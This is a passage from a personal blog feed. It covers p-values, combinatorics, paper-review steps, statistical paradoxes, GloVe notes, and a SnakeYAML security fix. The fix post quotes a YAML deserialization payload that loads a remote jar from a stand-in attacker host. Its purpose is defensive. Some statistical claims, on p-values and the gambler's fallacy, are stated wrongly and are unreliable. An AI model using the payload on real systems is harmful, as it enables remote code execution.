assumption is that both groups have been given the same drug and are
getting cured and hence there are no differences between these two
groups. Multiple runs might give a higher p-value proving that the
groups are cured and the effect of the drug A are same.</p>
<p>But due to pure random effect, if the p-value of two groups having
the same drug, is small, say p=0.01, then it is a False Positive of the
Null Hypothesis. As our intent is to break the null hypothesis, this
particular experiment disproves the experiment and confirms the null
hypothesis for this particular round of experiment.</p>
<p>So with multiple experiments “A p=0.05 threshold means that 5% of the
experiments, where the differences come from random things, will
generate a p-value < 0.05”</p>
<p>Using this statement, for the test with Drug A vs Drug B, a p-value
of < 0.05 would mean that there is no difference between Drug A and
Drug B, since the different reactions might be just random. ie., we will
allow up to 5 False Positives in 100 experiment runs, to prove that Drug
A is different that Drug B. Any more false positives than 5, proves that
the null hypothesis is true based on this threshold. Hence it is
important to determine this p-value or threshold before running the
experiments to prevent being biased by the generated data.</p>
<p>For a stricter threshold, p=0.0001 might be used as well, where only
1 false positive is allowed in 10,000 experiments.</p>
<h3 id="compute-the-difference">Compute the difference</h3>
<p>Though, a p-value helps decide if the null hypothesis is true or not,
it does not provide a mechanism to determine how dissimilar the drugs
are. It is important to remember that p-value determines the probability
of the null hypothesis, but not the scale of difference in the
candidates of the experiment.</p>
<p>References (1) <a href="https://www.youtube.com/watch?v=vemZtEM63GY&list=WL&index=93">StatsQuest</a>
(2) <a href="https://www.youtube.com/watch?v=JQc3yx0-Q9E">StatsQuest</a></p>Review of Combinatorics2023-01-03T00:00:00-08:002023-01-03T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2023-01-03:/posts/review-of-combinatorics.htmlThis post reviews the basics of combinatorics and specifically the difference between permutations, variations and combinations.<p>In the study of combinatorics, there are three different structures -
<strong>permutations, variations and combinations</strong> which are
variations with subtle differences.</p>
<h2 id="permutation">Permutation</h2>
<p>A typical question for permutation is “How many ways to arrange the
three characters a,b and c?”. Note that the position and order matters
for permutation and to fill all the positions. A permutation defines the
numbers of different possible ways we can arrange a set of elements and
can always <strong>arrange the entire set of elements in the sample
space</strong>. Example: For a relay race, we can arrange 4-runners
already chosen in 4-positions using permutations.</p>
<blockquote>
<p>Permutations are arrangements of objects (with or without
repetition), the order does matter.</p>
</blockquote>
<p>Permutations without repetition if all elements are added and order
does matter with no repetition of elements.</p>
<p><span class="math display"><em>P</em><sub><em>n</em></sub> = <em>n</em>!</span></p>
<p>Permutations with repetition if all elements are added and order does
matter with repetition of elements being allowed.</p>
<p><span class="math display">$$
P^{a,b,c...}_{n} = \frac{n!}{(a! \cdot b! \cdot c! ...)}
$$</span></p>
<h3 id="examples-of-permutations">Examples of Permutations</h3>
<ul>
<li>Ways to put N items in a specific order.</li>
<li>Different strings that can be built using the 26 alphabets such that
each letter is used only once in a single string.</li>
<li>Order in which N people can enter a door</li>
</ul>
<h2 id="variations-extension-of-permutation">Variations (extension of
permutation)</h2>
<p>Variations can be considered an extension of permutation where
variations determines the total number of ways we can pick and arrange
some elements of a given set, with or without repetitions. Using the
relay race example from above, if we had to choose 4-runners out of
6-runners in the team (6-runners | 4-positions), and then decide who
runs in which lap (**pick & arrange), we would require using
Variations.</p>
<blockquote>
<p>Variations are arrangements of selections of objects, where the order
of the selected objects matters.</p>
</blockquote>
<p>Variations without repetition if not all the elements are added and
order does matter with no repetition of elements.</p>
<p><span class="math display">$$
V^n_{m} = \frac{m!}{(m - n)!}
$$</span></p>
<p>Variations with repetition if not all elements are added if 𝑚 > 𝑛
and order does matter with repetition of elements being allowed. All
elements can be added if 𝑚 ≤ 𝑛.</p>
<p><span class="math display"><em>V</em><sub><em>m</em></sub><sup><em>n</em></sup> = <em>m</em><sup><em>n</em></sup></span></p>
<h3 id="examples-of-variations">Examples of Variations</h3>
<ul>
<li>Ways, in which 3 out of 10 sports people can win a medal in a
competition, the first winning gold, the next silver, and the third
bronze.</li>
<li>Possibilities to choose 2 representatives out of 100 students, one
as the “president” and the other as the “vice-president”.</li>
<li>Different results when rolling 3 dice which are distinguishable by
color, e.g. white, red, and black dice.</li>
</ul>
<h2 id="combinations">Combinations</h2>
<p>The number of different ways we can pick a specific element of a set
where the order in which the elements needs to be selected is also not
important. Using the example of the relay race, if we only care about
which 4-runners out of 6-runners made it into the team
(<strong>pick</strong>) without any dependency on their position, we
would be dealing with combinations and order is not relevant.</p>
<blockquote>
<p>Combinations are selections of objects, with or without repetition,
the order does not matter.</p>
</blockquote>
<p>Combinations without repetition if not all elements are added and
order does not matter where <strong>elements are not
repeated.</strong></p>
<p><span class="math display">$$
C^n_{𝑚} = \frac{𝑚!}{𝑛! \cdot (𝑚−𝑛)!}
$$</span></p>
<p>Combinations with repetition if not all elements are added and order
does not matter where <strong>elements are repeated.</strong></p>
<p><span class="math display">$$
C^n_{𝑚} = \frac{(𝑚 + n -1)!}{𝑛! \cdot (𝑚−1)!}
$$</span></p>
<h3 id="examples-of-combinations">Examples of Combinations</h3>
<ul>
<li>Ways, in which 3 out of 10 sports people can win a medal in a
competition (no matter whether gold, silver, or bronze).</li>
<li>Possibilities to choose 2 representatives out of 100 students,
irrespective of the role.</li>
<li>Different results when rolling 3 identical dice, irrespective of the
order.</li>
</ul>
<h2 id="references">References</h2>
<ol type="1">
<li><a href="https://betterexplained.com/articles/easy-permutations-and-combinations/">Better
Explained</a></li>
<li><a href="https://www.bookofproofs.org/branches/permutations-combinations-variations/">Book
of Proofs</a></li>
<li><a href="https://www.quora.com/What-is-the-difference-between-variation-combination-and-permutations">Quora</a></li>
</ol>Scientific paper review template2022-11-16T00:00:00-08:002022-11-16T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2022-11-16:/posts/scientific-paper-review-template.htmlA template to capture notes and reviews of scientific research papers<p>Using some commonly available standards [1] and word of the crowd
[2], following is a rough template of how to review a research paper and
collect notes for future references.</p>
<h3 id="first-pass">First Pass</h3>
<p>The first pass is to review the usefulness of the paper using its
<strong>Title</strong>, <strong>Abstract</strong>, and
<strong>Figures</strong> (atleast the key figures of the paper),
primarily Figure 1 and 2.</p>
<h3 id="second-pass">Second Pass</h3>
<p>As part of the second pass, review the <strong>Introduction</strong>,
<strong>Conclusion</strong>, and the <strong>Figures</strong> carefully
again and skim the rest. The intent of this pass is to create a
<strong>Summary</strong> which captures the purpose of the paper and if
possible what <strong>major questions</strong> are being answered.</p>
<h3 id="third-pass">Third Pass</h3>
<p>Review the <strong>Related Work</strong> section if this paper needs
a more in-depth analysis or answers one of the open problems that we are
actively working on. We should attempt to identify the paper
implementation code and the data used. The potential locations are
<strong>Paperswithcode</strong>, <strong>Github</strong>,
<strong>Huggingface</strong> or <strong>Kaggle</strong> and also review
blogs for more concise explanations and examples.</p>
<h3 id="checkpoint---note-summary">Checkpoint - Note summary</h3>
<p>The below is necessary for all papers being reviewed to make any
decision on further introspection or file them away for future
exploration.</p>
<ol type="1">
<li><strong>Abstract:</strong> - problem | relevancy | solution |
summary | objective | novelty | keywords</li>
<li><strong>Figure 1</strong> - visual summary of the main idea</li>
<li><strong>Intro</strong> - relevancy | problem defn | solution</li>
<li><strong>Conclusion:</strong> main outcome | future work</li>
<li><strong>Data:</strong> dataset used for results, training,
metrics</li>
<li><strong>Tasks:</strong> Planned tasks or objectives</li>
<li><strong>Results:</strong> baseline | benchmarks | improvements |
comparison to other famous models</li>
<li><strong>Utility:</strong> application for our problem</li>
<li><strong>Future:</strong> Potential Improvements identified in the
paper or we can think of.</li>
</ol>
<h4 id="fourth-pass-implementation-review">Fourth Pass [Implementation
Review]</h4>
<p>Do this only for papers you would like to replicate/improve</p>
<ul>
<li><strong>Model Architecture:</strong> Architecture description layers
used and network structure</li>
<li><strong>Inputs & Outputs:</strong> Inputs | Outputs whether it
is a probability, segmentation map, bounding boxes, and so on</li>
<li><strong>New or novel layers:</strong> new techniques or layers |
code or the implementation probably focus on these novel layers</li>
<li><strong>Loss calculation:</strong> mathematical formula for how the
loss was calculated | on what basis it was chosen</li>
<li><strong>Model Training:</strong> hyperparameter used, the batch
size, and the model configurations</li>
<li><strong>Know what you did not understand</strong> - Highlight the
points you did not understand | find references and resources that can
help you</li>
</ul>
<h3 id="fifth-pass-replication">Fifth Pass [Replication]</h3>
<p>Train the model on the paper data if it is available and try to
replicate the results if it is possible. If not possible, apply the
model on just a subset of the data or just for one epoch to make sure
that the implemented model is working as expected and then you can apply
it to your data.</p>
<h3 id="sixth-pass-adoption">Sixth Pass [Adoption]</h3>
<p>Apply the same model as in the paper without any modifications to any
other data set and capture the results. Attempt to modify or generalize
it for the paper dataset and observe its results. Capture why it works
or does not work? What issues do we run into?</p>
<p>The below is necessary for all papers being replicated and adapted. -
<strong>Model Modifications:</strong> modifications, hyperparameter
used, the batch size, and the model configurations -
<strong>Techniques</strong> - Highlight the problems and techniques
applied to fix them</p>
<h4 id="references">References</h4>
<p>[1] Stanford CS230: Deep Learning | Autumn 2018 | Lecture 8 - Career
Advice / Reading Research Papers. www.youtube.com,
https://www.youtube.com/watch?v=733m6qBH-jI. Accessed 26 Nov. 2022.</p>
<p>[2] Hosni, Youssef. “How to Read Machine Learning Papers
Effectively.” Medium, 9 Oct. 2022,
https://pub.towardsai.net/how-to-read-machine-learning-papers-effectively-9c2df7906516.</p>Paradoxes in statistics2022-06-04T00:00:00-07:002022-06-04T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-06-04:/posts/paradoxes-in-statistics.htmlThis post describes some of the well known paradoxes in statistics<p>Came across this <a href="https://twitter.com/maartenvsmeden/status/1356147552362639366">tweet</a>
about statistical paradoxes and wanted to learn what they mean.</p>
<h3 id="absence-of-evidence-fallacy">Absence of evidence fallacy</h3>
<p>The absence of evidence fallacy occurs when someone uses a lack of
evidence to try to “prove” something. Of course, the problem with this
line of reasoning is that a lack of evidence is just that: a lack.
Evidence of absence is evidence of any kind that suggests something is
missing or that it does not exist.</p>
<p><a href="https://en.wikipedia.org/wiki/Evidence_of_absence">Reference</a></p>
<h3 id="ecological-fallacy">Ecological fallacy</h3>
<p>A mistake caused by assuming what is true for a group is true for the
individual members of the group. (noun) In statistical analysis, an
error caused by inferring aggregate data remains true on an individual
level.</p>
<p><a href="https://sociologydictionary.org/ecological-fallacy/">Reference</a></p>
<h3 id="steins-paradox">Stein’s paradox</h3>
<p>Stein’s example (or phenomenon or paradox), in decision theory and
estimation theory, is the phenomenon that when three or more parameters
are estimated simultaneously, there exist combined estimators more
accurate on average (that is, having lower expected mean squared error)
than any method that handles the parameters separately.</p>
<p><a href="https://en.wikipedia.org/wiki/Stein%27s_example">Reference</a></p>
<h3 id="lords-paradox">Lord’s paradox</h3>
<p>When two groups are compared in a pre-post study, two different
conclusions can be drawn between the two-sample t-test and the analysis
of covariance (ANCOVA). It is known as Lord’s Paradox, and it occurs
because the parameter in the two-sample t-test and the parameter of
interest in the ANCOVA model are not the same quantity. The difference
between the two parameters can be explained by the covariance of
linearly combined random variables which is an important topic in
introductory statistical theory courses.</p>
<p><a href="https://www.ccsenet.org/journal/index.php/ijsp/article/view/75051">Reference</a></p>
<h3 id="simpsons-paradox">Simpson’s paradox</h3>
<p>Simpson’s paradox, which also goes by several other names, is a
phenomenon in probability and statistics in which a trend appears in
several groups of data but disappears or reverses when the groups are
combined. This result is often encountered in social-science and
medical-science statistics,[1][2][3] and is particularly problematic
when frequency data is unduly given causal interpretations.</p>
<p><a href="https://en.wikipedia.org/wiki/Simpson%27s_paradox">Reference</a></p>
<h3 id="berksons-paradox">Berkson’s paradox</h3>
<p>Berkson’s paradox (also known as Berkson’s fallacy or Berkson’s bias)
is the counter-intuitive idea that events which seem to be correlated
actually are not. Take two events, A and B, which are completely
independent events (for example, lung cancer and diabetes). If a study
selects for both the presence of A (lung cancer) and B (diabetes), the
presence of diabetes will make the presence of lung cancer more likely.
Intuitively, this makes no sense, but the data seems to back this
counter-intuitive notion up, showing that there is, in fact, a
connection.</p>
<p><a href="https://www.statisticshowto.com/berksons-paradox-definition/">Reference</a></p>
<h3 id="prosecutors-fallacy">Prosecutors fallacy</h3>
<p><em>tbd</em></p>
<h3 id="gamblers-fallacy">Gambler’s fallacy</h3>
<p>The gambler’s fallacy is the belief that the probability for an
outcome after a series of outcomes is not the same as the probability
for a single outcome. The gambler’s fallacy is real and true in cases
where the events in question are independent and identically
distributed.</p>
<p><a href="https://www.tandfonline.com/doi/abs/10.1080/13669877.2017.1378248?journalCode=rjrr20#:~:text=The%20gambler's%20fallacy%20is%20the%20belief%20that%20the%20probability%20for,are%20independent%20and%20identically%20distributed.">Reference</a></p>
<h3 id="lindleys-paradox">Lindley’s paradox</h3>
<p>Lindley’s paradox is a counterintuitive situation in statistics in
which the Bayesian and frequentist approaches to a hypothesis testing
problem give different results for certain choices of the prior
distribution. It is in fact a difficulty reconciling two paradigms —
Bayesian and frequentist statistics.</p>
<ul>
<li>Bayes — probability is a (unique) measure of degree of belief (see
e.g., Cox’s theorem in Chap. 2 of Jaynes3)</li>
<li>Frequentist — probability is the (asymptotic) frequency at which an
outcome occurs, in a hypothetical sequence of repeated trials</li>
</ul>
<p><a href="https://andrewfowlie.github.io/talks/jl-paradox.pdf">Reference</a>
| <a href="https://en.wikipedia.org/wiki/Lindley%27s_paradox">Reference</a></p>
<h3 id="low-birthweight-paradox">Low birthweight paradox</h3>
<p>The low birth-weight paradox is an apparently paradoxical observation
relating to the birth weights and mortality rate of children born to
tobacco smoking mothers. Low birth-weight children born to smoking
mothers have a lower infant mortality rate than the low birth weight
children of non-smokers. It is an example of Simpson’s paradox.
Traditionally, babies weighing less than a certain amount (which varies
between countries) have been classified as having low birth weight. In a
given population, low birth weight babies have a significantly higher
mortality rate than others; thus, populations with a higher rate of low
birth weights typically also have higher rates of child mortality than
other populations.</p>
<p><a href="https://en.wikipedia.org/wiki/Low_birth-weight_paradox">Reference</a></p>Secure Constructor object for SnakeYAML2022-04-19T00:00:00-07:002022-04-19T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-04-19:/posts/secure-constructor-object-for-snakeyaml.htmlThis post explores the pitfalls and steps to securely read an YAML file using SnakeYAML library<p>We use <a href="https://bitbucket.org/snakeyaml/snakeyaml/src/master/">SnakeYAML</a>
for simple parsing of YAML files in Java, as part of <a href="https://github.com/eBay/ebay-oauth-java-client">ebay-oauth-java-client</a>
configuration. We were made aware of a vulnerability within the code due
to the usage of <code>Yaml yaml = new Yaml()</code> and then following
it with <code>yaml.loadAs(fis, Map.class);</code>. This issue was first
reported as part of <a href="https://github.com/kubernetes-client/java/issues/1698">Kubernetes
java client</a>, but affects any code which uses SnakeYaml for reading
generic types.</p>
<p>Yaml allows a class type to be tagged in the file using its name such
as <code>!!java.net.URLClassLoader</code>. So when
<code>yaml.loadAs</code> loads the file, it instantiates objects for the
tagged classes in the file. SnakeYAML recommends addressing this issue
using <a href="https://bitbucket.org/snakeyaml/snakeyaml/wiki/Documentation#markdown-header-type-safe-collections">type-safe-collections</a>
where the object types are defined and a <code>Constructor</code> object
is used to allow only specific types such as below. <a href="https://bitbucket.org/snakeyaml/snakeyaml/wiki/Documentation#markdown-header-type-safe-collections">Reference</a></p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="bu">Constructor</span> constructor <span class="op">=</span> <span class="kw">new</span> <span class="bu">Constructor</span><span class="op">(</span>Car<span class="op">.</span><span class="fu">class</span><span class="op">);</span><span class="co">//Car.class is root</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a>TypeDescription carDescription <span class="op">=</span> <span class="kw">new</span> <span class="fu">TypeDescription</span><span class="op">(</span>Car<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a>carDescription<span class="op">.</span><span class="fu">putListPropertyType</span><span class="op">(</span><span class="st">"wheels"</span><span class="op">,</span> Wheel<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a>constructor<span class="op">.</span><span class="fu">addTypeDescription</span><span class="op">(</span>carDescription<span class="op">);</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a>Yaml yaml <span class="op">=</span> <span class="kw">new</span> <span class="fu">Yaml</span><span class="op">(</span>constructor<span class="op">);</span></span></code></pre></div>
<p>However, this does not work for generic types such as
<code>java.util.Map</code> objects and such generic types are handled
specifically within SnakeYAML using <code>tag:map</code> or
<code>tag:sequence</code> for lists.</p>
<h3 id="how-does-this-work">How does this work</h3>
<p>The specifics of this issue is available in <a href="https://j0vsec.com/post/cve-2021-25738/">detail</a> by the
original reporter. When the config file contains
<code>some_var: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker-server.tld/poc.jar"]]]]</code>,
the default Constructor loads the ScriptEngineManager and attempts to
load the jar from a remote location and execute them.</p>
<h3 id="how-to-address-this">How to address this</h3>
<p>YAML specification defines a <a href="http://blogs.perl.org/users/tinita/2018/01/introduction-to-yaml-schemas-and-tags.html">FailSafe
Schema</a> which allows only <code>str</code>,<code>sequence</code> and
<code>map</code> and prevents all other types from even being
instantiated. SnakeYaml follows this fail-safe schema using <a href="https://javadoc.io/static/org.yaml/snakeyaml/1.25/org/yaml/snakeyaml/constructor/SafeConstructor.html">SafeConstructor</a>.
Using the SafeConstructor to create
<code>Yaml yaml = new Yaml(new SafeConstructor());</code> prevents any
arbitary class from getting loaded. For specific types, using
<code>TypeDescription</code> and adding to the constructor object as
shown above ensures only the allowed types are instantiated.</p>
<h3 id="how-does-this-look">How does this look</h3>
<p>The below is an inside look of all the allowed types using the
default <code>new Constructor()</code> and the
<code>yamlClassConstructors</code> has the <code>scalar</code> and
<code>sequence</code> classes which allows the arbitrary class
instantiation.</p>
<p><img src="/extras/images/snakeyaml/regular_constructor_sequence_tag.png"/></p>
<p>However, once the <code>new Constructor()</code> is substituted with
<code>new SafeConstructor()</code>, the arbitrary code will fail with
the following error confirming that the issue has been addressed.</p>
<p><img alt="drawing" src="/extras/images/snakeyaml/safe_constructor_error.png" width="950"/></p>NLP Glove Algorithm and further improvements on representation2022-04-10T00:00:00-07:002022-04-10T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2022-04-10:/posts/nlp-glove-algorithm-and-further-improvements-on-representation.htmlA post detailing about the Glove algorithm, its variations and utilities and further improvements on word representation<p>This lecture introduces the GLove model, the intuition behind the
algorithm and different means to evaluate them.</p>
<p>Glove was an algorithm for word vectors that was made by Jeffrey
Pennington, Richard Socher, and Christopher Manning in 2014 and acted as
the starting point of connecting together the linear algebra based
methods on co-occurrence matrices like LSA and COALS with the models
like skip-gram, CBOW and others, which were iterative neural updating
algorithms. The earlier linear algebra methods actually had their
advantages for fast training and efficient usage of statistics, the
results weren’t as good perhaps because of disproportionate importance
given to large counts in the main. Conversely, the neural models seemed
to performing gradient updates on word-windows, and inefficiently using
statistics versus the co-occurrence matrix. Though, it was actually
easier to scale to a very large corpus by trading time for space.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_count_prediction.png"/></p>
<p>The motivation was to use neural methods, which generated improved
performance on many taskss, and identify the properties necessary to
have these analogies work, such as going from male to female, queen to
king. Or going from a verb to its agent, truck to driver.</p>
<h3 id="analogies-and-meaning-components">Analogies and Meaning
components</h3>
<p>The intent behind the Glove design was to represent the “meaning”
components as ratios of co-occurrence probabilities. As an example, the
below illustrates the spectrum from solid to gas as in physics. The word
“solid” co-occurs with the word “ice” often, while the word “gas”
doesn’t occur with the word “ice” as many times. But the problem is the
word “water” will also occur a lot with ice, while any other random word
like the word “fashon”, doesn’t occur with the word “ice” many times. In
contrast, if we look at words co-occurring with the word “steam”,
“solid” won’t occur with “steam” many times, but “gas” will. The water
will also co-occur again and “fashion” occurence will be small. So to
determine the meaning component of traversing from gas to solid, it
would be useful to look at the ratio of these co-occurrence
probabilities.</p>
<p>Because then we get a spectrum from large to small between solid and
gas. Whereas for water and a random word, it basically cancels out and
gives youI just wrote these numbers in.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_meaning_components.png"/></p>
<p>In an actual large corpus, the following are actual co-occurrence
probabilities.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_cooccurence_probabilities.png"/></p>
<p>as noted the co-occurence probabilities cancel out for “water” and
while for fashion is it low, both around 1. Whereas the ratio of
probability of co-occurrence of solid with ice or steam is about 10. And
for gas it’s about a 10th.</p>
<h4 id="log-bi-linear-model">Log bi-linear model</h4>
<p><img src="/extras/images/nlp-glove-algorithm/log_bilinear.png"/></p>
<p>In order to capture these ratios of co-occurrence probabilities as
linear meaning components within the word vector space, we can just add
and subtract linear meaning components. This can be achieved using a
log-bilinear model. So that <strong>the dot product between two word
vectors attempts to approximate the log of the probability of
co-occurrence.</strong> So if you do that, you then get this property
that the difference between two vectors, its similarity to another word
corresponds to the log of the probability ratio shown on the previous
figure.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_loss_fn.png"/></p>
<p>So the GloVe model attempts to unify the thinking between the
co-occurrence matrix models and the neural models by being some way
similar to a neural model 1. calculated on top of a co-occurrence matrix
count. 2. Has an explicit loss function.</p>
<p>And the explicit loss function is the diference of the dot product to
the log of the co-occurrence. To prevent very common words from
dominating, the effect of high word counts are capped using the
<em>f</em> function. This structure allows the optimization of the
<em>J</em> function directly on the co-occurrence count matrix,
providing a fast training scalable to huge corpora.</p>
<h4 id="objective-function-for-the-glove-model-log-bilinear-means">Objective
function for the GloVe model / log-bilinear means</h4>
<p><strong>log-bilinear</strong> - the “bi” is indicative of the two
terms <em>wi</em> and <em>wj</em>, similar to an algebraic value of
<em>ax</em> where the term i linear in <em>x</em> and <em>a</em> is a
constant. The difference is squared to ensure that the term is always
positive and J is a minimization problem. There are two bias terms for
both words which can move things up and down for the word in general. So
if in general probabilities are high for a certain word, this bias term
can model specifically for that word.</p>
<h4 id="explanation-for-fxij">Explanation for f(Xij)</h4>
<p><em>f(Xij)</em> is provided to scale things depending on the
frequency of a word because we want to pay more attention to words that
are more common or word pairs that are more common. But there is a
potential issue when we have extremely common words like function words.
So the function <em>f(Xij)</em> typically pays attention to words that
co-occurred together up until a certain point. And then the curve just
goes flat, so it didn’t matter if it was even an extremely, extremely
common word.</p>
<h3 id="results">Results</h3>
<p><img src="/extras/images/nlp-glove-algorithm/glove_frog_results.png"/></p>
<p>Nearest words to the word “frog” - We get “frogs”, “toad”, and then
we get some complicated words. But it turns out they are all frogs,u
ntil we get down to lizards.</p>
<h3 id="evaluation-of-glove-algorithm">Evaluation of Glove
algorithm</h3>
<p>There are typically two ways of evaluation - Intrinsic and extrinsic.
In an intrinsic evaluation we evaluate directly on the specific or
intermediate subtasks that we’ve been working on. Intrinsic evaluations
are fast to compute and help understand the component we’ve been working
on.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_evaluate.png"/></p>
<p>An extrinsic evaluation is to utilize a real task of interest, such
as web search or machine translation and use that goal to improve
performance on that task. However, such evaluation takes longer due to
the extensiveness of the system involved. And sometimes it is difficult
to attribute the result to the appropriateness of the word vectors or
due to some other components of the system or if the interaction was
just better with your previous version of the word vectors.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_intrinsic.png"/></p>
<p>For intrinsic evaluation of word vectors, we can provide models with
a big collection of word vector analogy problems, such as man is to
woman as king is to blank? And tune the model to find the word that is
closest, such as queen and produce an accuracy score of how often that
the model evaluates it accurately.</p>
<p>Note: Many times during such evaluation, the actual closest word is
really just “king”. So to prevent this issue, the three input words are
not allowed in the selection process, choosing only the nearest word
that isn’t one of the input words.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_viz_1.png"/></p>
<p>From the GloVe vector examples above, they exhibit a strong linear
component property such as the male-female dimension. For example,
taking the vector difference of “man” and “woman” and adding the vector
difference onto “brother”, the expectation is to get to “sister” and
king, queen, and for many of these examples. But some examples may not
work, such as starting from “emperor”, the vector might get to
“countess” or “duchess” instead.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_viz_2.png"/></p>
<p>And these two examples illustrate that the Company to CEO and
superlatives also move in roughly linear components.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_viz_3.png"/></p>
<h3 id="evaluation-metrics">Evaluation Metrics</h3>
<p>word2vec authors built a data set of analogies to evaluate different
models on the accuracy of their analogies, including semantic and
syntactic analogies. Unscaled co-occurrence counts via an SVD work
terribly. Some scaling can get SVD of a scaled count matrix to work
reasonably well, hence SVD-L is similar to the COALS model. They do a
decent enough job without a neural network.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_eval_results.png"/></p>
<p>The results also illustrate how word2vec and GloVe models performed
and in 2014 was considered optimal. However, it might have scored better
due to better data.</p>
<h3 id="better-data">Better Data</h3>
<p><img src="/extras/images/nlp-glove-algorithm/glove_analogy_data.png"/></p>
<p>The above image illustrates the semantic, syntactic and overall
performance on word analogies of GloVe modelthat when trained on
different subsets of data. One of the big advantage was that the GloVe
model was partly trained on Wikipedia as well as other text. Whereas the
word2vec model that was released was trained exclusively on Google News,
which is not as good as even one quarter of the size amount of Wikipedia
data for semantics. On the right end, with Common Crawl Web data, 42
billion words, we get good scores again from the semantic side.</p>
<p>The graph on the right then shows performance against the vector
dimension. 25 dimensional vectors score poorly, while 100 dimensional
vectors already work reasonably well, but still get significant gains
for 200 and somewhat to 300 and recently 300 dimensional vectors seems
to be the sweet spot, with the best known sets of word vectors,
including the word2vec vectors and the GloVe vectors provide 300
dimensional word vectors.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_intrinsic_eval_2.png"/></p>
<h3 id="human-judgments-of-word-similarity">Human judgments of word
similarity</h3>
<p>Another intrinsic evaluation you can do is see how these models model
human judgments of word similarity. So psychologists for several decades
have actually taken human judgments of word similarity. Where literally
you’re asking people for pairs of words like “professor” and “doctor” to
give them a similarity score that’s being measured as some continuous
quantity giving you a score between, say 0 and 10.</p>
<p>They responses are then averaged over multiple human judgments as to
how similar different words are. For example, “tiger” and “cat” are
pretty similar. “Computer” and “internet” are pretty similar, while
“Plane” and “cars” less similar. “Stock” and “CD” aren’t very similar at
all but “stock” and “jaguar” are even less similar.</p>
<p><img src="/extras/images/nlp-glove-algorithm/glove_correlation.png"/></p>
<p>And in particular, we can measure a <strong>correlation coefficient
</strong>of whether they give the same ordering of similarity judgments.
And there are various different data sets of word similarities and
scorinf of different models as to how well they do on such similarities.
Plain SVD’s works comparatively better here for similarities than it did
for analogies, not completely terrible because we no longer need that
linear property. Scaled SVD’s work a lot better, Word2vec works a bit
better than that and with similar minor advantages from the GloVe
model.</p>
<h3 id="extrinisic-evaluation">Extrinisic Evaluation</h3>
<p>NER (named entity recognition) is an extrinsic task for identifying
mentions of a person’s name or an organization name like a company or a
location. Having good word vectors help perform named entity recognition
effectively. Starting with a model with discrete features, which uses
word identity as features, we can build a named entity model doing that
and adding word vectors provides a better representation of the meaning
of words. <img alt="Glove NER" src="/extras/images/nlp-glove-algorithm/glove_ner.png"/></p>
<blockquote>
<p><a href="https://arxiv.org/pdf/2203.13928.pdf">On the Intrinsic and
Extrinsic Fairness Evaluation Metrics for Contextualized Language
Representations</a> <em>by Yang Trista Cao et al.</em> is a good
reference on these different evaluation metrics and underlying
biases.</p>
</blockquote>
<h3 id="word-senses-and-word-sense-ambiguity">Word Senses and word sense
ambiguity</h3>
<p>There are different meanings of the word pike</p>
<ul>
<li>A sharp point or staff</li>
<li>A type of elongated fish</li>
<li>A railroad line or system</li>
<li>A type of road</li>
<li>The future (coming down the pike)</li>
<li>A type of body position (as in diving)</li>
<li>To kill or pierce with a pike</li>
<li>To make one’s way (pike along)</li>
<li>In Australian English, pike means to pull out from doing something:
I reckon he could have climbed that cliff, but he piked!</li>
</ul>
<h4 id="improving-word-representations-via-global-context-and-multiple-word-prototypes-huang-et-al.-2012">Improving
Word Representations Via Global Context And Multiple Word Prototypes
(Huang et al. 2012)</h4>
<p>The gut feeling is usually to have different vectors for each meaning
of the same word, as it seems counter-intutive to have the same vector
for all the different meanings. If “Pike”, and other words have
<strong>“word sense”</strong> vectors. This paper attempted to improve
the representation of words such as “pike”. The primary idea was to
cluster word windows around words, retrain with each word assigned to
multiple different clusters bank1, bank2, etc. And then for the clusters
of word tokens, start treating them as if they were separate words and
learning a word vector for each. So basically this does work and we can
learn word vectors for different senses of a word. But actually this
isn’t the majority way that things have then gone in practice. Primarily
due to increased complexity, and it tends to be imperfect in its own way
as we’re trying to take all the uses of the word “pike” and sort of cut
them up into key different senses, where differences overlap and there
is no clear distinction. It’s always very unclear how you cut word
meaning into different senses.</p>
<p>In an overall sense, the word vector is generated as a superposition
of the word vectors for the different senses of a word, here
“superposition” means no more or less a weighted sum. So the vector that
we learn for “pike” will be a weighted average of the vectors that would
have learned for the medieval weapons sense, plus the fish sense, plus
the road sense, plus whatever other senses that you have, <strong>where
the weighting that’s given to these different sense vectors corresponds
to the frequencies of use of the different senses.</strong></p>
<p>And adding up several different vectors into an average does not lose
the real meanings of the word and it turns out that this average vector
in applications, tends to self-disambiguate.</p>
<h3 id="references">References</h3>
<ol type="1">
<li><a href="https://www.youtube.com/watch?v=gqaHkPEZAew">Video</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/slides/cs224n-2022-lecture02-wordvecs2.pdf">Slides</a></li>
<li><a href="http://web.stanford.edu/class/cs224n/readings/cs224n-2019-notes02-wordvecs2.pdf">Notes</a></li>
</ol>
<h3 id="suggested-readings">Suggested Readings</h3>
<ol type="1">
<li><a href="http://nlp.stanford.edu/pubs/glove.pdf">GloVe: Global
Vectors for Word Representation</a> (original GloVe paper)</li>
